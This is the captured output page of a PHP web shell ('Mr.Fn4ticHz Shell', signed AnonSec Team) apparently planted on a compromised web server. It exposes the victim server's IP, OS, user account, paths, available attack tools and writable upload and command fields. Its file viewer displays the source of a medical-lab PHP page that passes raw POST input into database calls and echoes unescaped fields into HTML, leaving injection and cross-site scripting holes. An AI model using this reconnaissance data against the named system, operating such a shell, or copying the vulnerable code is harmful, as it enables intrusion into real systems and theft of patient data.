Mr.Fn4ticHz Shell
Server IP : 162.240.98.243  /  Your IP : 3.136.18.218
Web Server : Apache
System : Linux server.bti.yaw.mybluehostin.me 3.10.0-1160.119.1.el7.x86_64 #1 SMP Tue Jun 4 14:43:51 UTC 2024 x86_64
User : btiyawmy ( 1003)
PHP Version : 7.2.34
Disable Function : NONE
MySQL : OFF  |  cURL : ON  |  WGET : ON  |  Perl : ON  |  Python : ON  |  Sudo : ON  |  Pkexec : ON
Directory :  /home/btiyawmy/public_html/login.easenup.in/

Upload File :
current_dir [ Writeable ] document_root [ Writeable ]

 

Command :


[ HOME ]     

Current File : /home/btiyawmy/public_html/login.easenup.in/updateinhouseinvestion.php
      <?php
session_start();
require_once("../LoginManager.php");
require_once("../DBManager.php");
include("dbconnection.php");
include("header.php");
include 'workdeskmenu.php';
?>

      <style>

 
/* Automatic Serial Number Row */
.css-serial {
 counter-reset: serial-number; /* Set the serial number counter to 0 */
}
.css-serial td:first-child:before {
 counter-increment: serial-number; /* Increment the serial number counter */
 content: counter(serial-number); /* Display the counter */
}
</style>
<style>
          .center {
   border: 1px solid grey;
   text-align:;

</style>
       <form action="actioninvestigation.php" method="POST">
 <div class="content-wrapper">
    <!-- Content Header (Page header) -->
    <section class="content-header">
      <div class='center'>
       <?php session_start();
require_once("../patientmanager.php");
require_once("../DBManager.php");

	 if(isset($_POST[pathreport]))

	{
		PatientManager::listinvestigation("$_POST[Investigation]","$_POST[Method_name]","$_POST[entered_by]");
	 }
?>
<input type="search" class="light-table-filter" data-table="order-table" placeholder="Search" />
 <table id="example2"  class="order-table table table-bordered table-hover css-serial">
                  <thead>
                  <tr>
                       <th>SR No</th>
             <th><strong>Investigation</strong></th>
            <th><strong>Action</strong></th>
        </tr>
      
                  </thead>
<?php
include("dbconnection.php");
	$sqlpatient1 = "SELECT * FROM list_Investigation where labdepartmentid='1'";
	$qsqlpatient1 = mysqli_query($con,$sqlpatient1);
	while($rsn = mysqli_fetch_array($qsqlpatient1))
	{
	    $pavans=date('Y/m/d');
            echo " <tbody>
               <tr>         <td>&nbsp;</td>
               <td><input type='hidden' name='ivid[]' value='$rsn[ivid]'><input type='hidden' name='Investigation[]' value='$rsn[Investigation]'>$rsn[Investigation]</td>
               <td><div class='btn-group'>
	  <button type='button' class='btn btn-default dropdown-toggle' data-toggle='dropdown' aria-haspopup='true' aria-expanded='false'>
	    Action <span class='caret'></span>
	  </button>
	  <ul class='dropdown-menu'>
	    <li><a href='create_inhouse_investigation.php?ivid=$rsn[ivid]'> <i class='glyphicon glyphicon-edit'></i> Create</a></li>
	    
	    <li><a type='button' data-toggle='modal' id='paymentOrderModalBtn' data-target='#paymentOrderModal' onclick='paymentOrder('.$orderId.')'> <i class='glyphicon glyphicon-save'></i> Update</a></li>
	  </ul>
	</div></td>
          </tr>                   
          
          ";
}

?>    </tbody>
  <tfoot>
          </tfoot>
        </table>
 
       <center><input type="submit" value="Submit" name="pathreport"></center>
</div>
      </form>
         

Anon7 - 2022
AnonSec Team